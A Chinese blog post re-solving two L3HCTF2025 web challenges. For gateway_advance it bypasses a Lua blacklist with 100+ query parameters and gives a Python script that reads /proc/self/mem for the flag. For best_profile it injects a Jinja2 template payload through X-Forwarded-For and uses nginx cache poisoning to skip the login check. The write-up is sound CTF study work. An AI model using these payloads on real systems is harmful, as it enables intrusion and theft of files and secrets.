L3HCTF2025-web复现
本文最后更新于186 天前,其中的信息可能已经过时,如有错误请发送邮件到270371528@qq.com

L3HCTF2025-web复现

gateway_advance

给了附件,看下docker

FROM openresty/openresty:alpine

COPY ./nginx.conf /usr/local/openresty/nginx/conf/nginx.conf
COPY ./www /www
RUN echo "L3HCTF{test_flag}" > /flag
RUN echo "test_password" > /password

EXPOSE 80

CMD ["sh", "-c", "openresty -g 'daemon off;'"]

使用官方 openresty:alpine 镜像作为基础(轻量级,基于 Alpine Linux)。OpenResty 是 Nginx 的增强版,内置 LuaJIT 支持,适合高性能 Web 和 API 网关。

所以本题web服务是(nginx+lua)。然后就是配置文件和启动命令。这里是将flag和password写入文件。

看一下配置文件:

worker_processes 1;

events {
    use epoll;
    worker_connections 10240;
}

http {
    include mime.types;
    default_type text/html;
    access_log off;
    error_log /dev/null;
    sendfile on;

    init_by_lua_block {
        f = io.open("/flag", "r")
        f2 = io.open("/password", "r")
        flag = f:read("*all")
        password = f2:read("*all")
        f:close()
        password = string.gsub(password, "[nr]", "")
        os.remove("/flag")
        os.remove("/password")
    }

    server {
        listen 80 default_server;
        location / {
            content_by_lua_block {
                ngx.say("hello, world!")
            }
        }

        location /static {
            alias /www/;
            access_by_lua_block {
                if ngx.var.remote_addr ~= "127.0.0.1" then
                    ngx.exit(403)
                end
            }
            add_header Accept-Ranges bytes;
        }

        location /download {
            access_by_lua_block {
                local blacklist = {"%.", "/", ";", "flag", "proc"}
                local args = ngx.req.get_uri_args()
                for k, v in pairs(args) do
                    for _, b in ipairs(blacklist) do
                        if string.find(v, b) then
                            ngx.exit(403)
                        end
                    end
                end
            }
            add_header Content-Disposition "attachment; filename=download.txt";
            proxy_pass http://127.0.0.1/static$arg_filename;
            body_filter_by_lua_block {
                local blacklist = {"flag", "l3hsec", "l3hctf", "password", "secret", "confidential"}
                for _, b in ipairs(blacklist) do
                    if string.find(ngx.arg[1], b) then
                        ngx.arg[1] = string.rep("*", string.len(ngx.arg[1]))
                    end
                end
            }
        }

        location /read_anywhere {
            access_by_lua_block {
                if ngx.var.http_x_gateway_password ~= password then
                    ngx.say("go find the password first!")
                    ngx.exit(403)
                end
            }
            content_by_lua_block {
                local f = io.open(ngx.var.http_x_gateway_filename, "r")
                if not f then
                    ngx.exit(404)
                end
                local start = tonumber(ngx.var.http_x_gateway_start) or 0
                local length = tonumber(ngx.var.http_x_gateway_length) or 1024
                if length > 1024 * 1024 then
                    length = 1024 * 1024
                end
                f:seek("set", start)
                local content = f:read(length)
                f:close()
                ngx.say(content)
                ngx.header["Content-Type"] = "application/octet-stream"
            }
        }
    }
}

可以看到在init_by_lua_block中:容器启动时读取并删除敏感文件 /flag/password,将其内容存入 Lua 变量。因为有f:close()但是没有f2:close(),没有关闭文件描述符,所以我们读取password可以去fd文件中读取,然后读取flag要去内存中找。再看下这几个路由

/ 返回hello world

/static 只允许127.0.0.1访问,提供/www/目录的文件

/download 用来代理下载文件,但设置了黑名单和响应内容过滤

/read_anywhere 用于文件读取,需要正确的 X-Gateway-Password 请求头

我们先本地看一下password文件的链接

image-20250716223454455

是在/fd/6。回到题目试一下。

黑名单绕过:ngx.req.get_uri_args() 默认只解析前 100 个查询参数。当参数超过100个时,超出的参数不会被黑名单检查。

回显会被过滤,这时候我们利用Range 头来进行部分回显,Range 头是 HTTP 协议中用于请求部分内容的请求头,格式为:Range: bytes=[start]-[end]

这里明明本地是/proc/1/fd/6。但是环境却不行,/proc/self或者/proc/7才可以。

image-20250716225446715

最后读到password为passwordismemeispasswordsoneverwannagiveyouup

然后带上password就可以去内存搜索flag啦。deepseek一把梭

import requests
import re

TARGET = "http://43.138.2.216:17794/"
PASSWORD = "passwordismemeispasswordsoneverwannagiveyouup"  # 替换为实际获取的password

def memory_dump():
    """从内存中恢复已删除的flag"""
    headers = {
        "X-Gateway-Password": PASSWORD,
        "X-Gateway-Filename": "/proc/self/mem",
        "X-Gateway-Start": "0",
        "X-Gateway-Length": "1048576"  # 每次读取1MB
    }

    # 1. 获取内存映射表
    try:
        maps = requests.get(
            f"{TARGET}/read_anywhere",
            headers={
                "X-Gateway-Password": PASSWORD,
                "X-Gateway-Filename": "/proc/self/maps"
            },
            timeout=5
        ).text
    except requests.RequestException as e:
        print(f"[-] 获取maps失败: {e}")
        return None

    # 2. 解析可读内存区域
    mem_regions = []
    for line in maps.splitlines():
        parts = line.split()
        if len(parts) >= 5 and "r" in parts[1]:  # 严格检查格式
            start, end = parts[0].split('-')
            mem_regions.append((int(start, 16), int(end, 16)))

    # 3. 扫描内存中的flag
    flag_pattern = re.compile(rb"L3HCTF{[^}]+}")  # 根据实际flag格式调整
    for start, end in mem_regions:
        chunk_size = 1024 * 1024  # 1MB分块读取
        for offset in range(start, end, chunk_size):
            headers["X-Gateway-Start"] = str(offset)
            headers["X-Gateway-Length"] = str(min(chunk_size, end - offset))

            try:
                response = requests.get(
                    f"{TARGET}/read_anywhere",
                    headers=headers,
                    stream=True,
                    timeout=5
                )
                if response.status_code == 200:
                    if match := flag_pattern.search(response.content):
                        return match.group(0).decode()
            except Exception as e:
                print(f"[-] 读取内存失败 ({hex(offset)}): {e}")
                continue
    return None

if __name__ == "__main__":
    print("[*] 开始内存扫描...")
    flag = memory_dump()
    if flag:
        print(f"[+] 找到flag: {flag}")
    else:
        print("[-] 未找到flag")

best_profile

给了docker,看下源码

import os
import re
import random
import string
import requests
from flask import (
    Flask,
    render_template,
    request,
    redirect,
    url_for,
    render_template_string,
)
from flask_sqlalchemy import SQLAlchemy
from flask_login import (
    LoginManager,
    UserMixin,
    login_user,
    login_required,
    logout_user,
    current_user,
)
from sqlalchemy.orm import DeclarativeBase
from sqlalchemy.orm import Mapped, mapped_column
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.middleware.proxy_fix import ProxyFix
import geoip2.database

class Base(DeclarativeBase):
    pass

db = SQLAlchemy(model_class=Base)

class User(db.Model, UserMixin):
    id: Mapped[int] = mapped_column(primary_key=True)
    username: Mapped[str] = mapped_column(unique=True)
    password: Mapped[str] = mapped_column()
    bio: Mapped[str] = mapped_column()
    last_ip: Mapped[str] = mapped_column(nullable=True)

    def set_password(self, password):
        self.password = generate_password_hash(password)

    def check_password(self, password):
        return check_password_hash(self.password, password)

    def __repr__(self):
        return "<User %r>" % self.name

app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///data.db"
app.config["SECRET_KEY"] = os.urandom(24)
app.wsgi_app = ProxyFix(app.wsgi_app)

db.init_app(app)
with app.app_context():
    db.create_all()

login_manager = LoginManager(app)

def gen_random_string(length=20):
    return "".join(random.choices(string.ascii_letters, k=length))

@login_manager.user_loader
def load_user(user_id):
    user = User.query.get(int(user_id))
    return user

@app.route("/login", methods=["GET", "POST"])
def route_login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if not username or not password:
            return "Invalid username or password."
        user = User.query.filter_by(username=username).first()
        if user and user.check_password(password):
            login_user(user)
            return redirect(url_for("route_profile", username=user.username))
        else:
            return "Invalid username or password."
    return render_template("login.html")

@app.route("/logout")
@login_required
def route_logout():
    logout_user()
    return redirect(url_for("index"))

@app.route("/register", methods=["GET", "POST"])
def route_register():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        bio = request.form["bio"]
        if not username or not password:
            return "Invalid username or password."
        user = User.query.filter_by(username=username).first()
        if user:
            return "Username already exists."
        user = User(username=username, bio=bio)
        user.set_password(password)
        db.session.add(user)
        db.session.commit()
        return redirect(url_for("route_login"))
    return render_template("register.html")

@app.route("/<string:username>")
def route_profile(username):
    user = User.query.filter_by(username=username).first()
    return render_template("profile.html", user=user)

@app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])
def route_check_ip(username):
    if not current_user.is_authenticated:
        return "You need to login first."
    user = User.query.filter_by(username=username).first()
    if not user:
        return "User not found."
    return render_template("last_ip.html", last_ip=user.last_ip)

geoip2_reader = geoip2.database.Reader("GeoLite2-Country.mmdb")
@app.route("/ip_detail/<string:username>", methods=["GET"])
def route_ip_detail(username):
    res = requests.get(f"http://127.0.0.1/get_last_ip/{username}")
    if res.status_code != 200:
        return "Get last ip failed."
    last_ip = res.text
    try:
        ip = re.findall(r"d+.d+.d+.d+", last_ip)
        country = geoip2_reader.country(ip)
    except (ValueError, TypeError):
        country = "Unknown"
    template = f"""
    <h1>IP Detail</h1>
    <div>{last_ip}</div>
    <p>Country:{country}</p>
    """
    return render_template_string(template)

@app.route("/")
def index():
    return render_template("index.html")

@app.after_request
def set_last_ip(response):
    if current_user.is_authenticated:
        current_user.last_ip = request.remote_addr
        db.session.commit()
    return response

if __name__ == "__main__":
    app.run()

不能发现,代码中有一行

template = f"""
    <h1>IP Detail</h1>
    <div>{last_ip}</div>
    <p>Country:{country}</p>
    """

是模板渲染,渲染last_ip,我们在仔细观察代码发现

@app.after_request
def set_last_ip(response):
    if current_user.is_authenticated:
        current_user.last_ip = request.remote_addr
        db.session.commit()
    return response

这个函数规定last_ip是通过request.remote_addr获取的。而代码中规定app.wsgi_app = ProxyFix(app.wsgi_app),这个ProxyFix中间件将会使用X-Forwarded-For请求头中的IP地址作为remote_addr。

也就是last_ip需要通过X-Forwarded-For请求头来进行注入。

这里我们已知/ip_detail路由用来打模板渲染,那么如何触发?这里需要注意一点

res = requests.get(f"http://127.0.0.1/get_last_ip/{username}")

requests.get函数是不会携带cookie认证的。而/get_last_ip路由的if not current_user.is_authenticated: 表明flask会进行登录检查。这说明如果我们在注册登录的时候污染XFF头,然后直接访问/ip_detail是不会渲染成功的。因为没有cookie。这就要用到nginx的缓存了。

看下题目给的配置文件

worker_processes 1;

events {
    use epoll;
    worker_connections 10240;
}

http {
    include mime.types;
    default_type text/html;
    access_log off;
    error_log /dev/null;
    sendfile on;
    keepalive_timeout 65;
    proxy_cache_path /cache levels=1:2 keys_zone=static:20m inactive=24h max_size=100m;

    server {
        listen 80 default_server;

        location / {
            proxy_pass http://127.0.0.1:5000;
        }

        location ~ .*.(gif|jpg|jpeg|png|bmp|swf)$ {
            proxy_ignore_headers Cache-Control Expires Vary Set-Cookie;
            proxy_pass http://127.0.0.1:5000;
            proxy_cache static;
            proxy_cache_valid 200 302 30d;
        }

        location ~ .*.(js|css)?$ {
            proxy_ignore_headers Cache-Control Expires Vary Set-Cookie;
            proxy_pass http://127.0.0.1:5000;
            proxy_cache static;
            proxy_cache_valid 200 302 12h;
        }
    }
}

这个配置文件规定了图片类型缓存30天,JS/CSS缓存12小时。

那么思路来了:我们可以通过用户名来欺骗服务器进行缓存,也就是让remote_addr缓存到nginx中,然后requests.get函数读取到缓存中的值进行渲染。

先注册一个.png用户,登录的时候抓包添加XFF进行注入,一定要把包中的cookie去掉

{% set chr=lipsum.__globals__.__builtins__.chr %}{{ lipsum.__globals__.__builtins__.open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)).read() }}

image-20250719233611048

然后访问/get_last_ip/<username>存储恶意IP到数据库(通过让 Nginx 缓存 /get_last_ip/evil.png 的响应,后续 /ip_detail 的内部 requests.get() 会直接读取缓存结果,跳过Flask的登录验证)。

image-20250719234114120
最后访问 /ip_detail 触发

image-20250719234152984

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇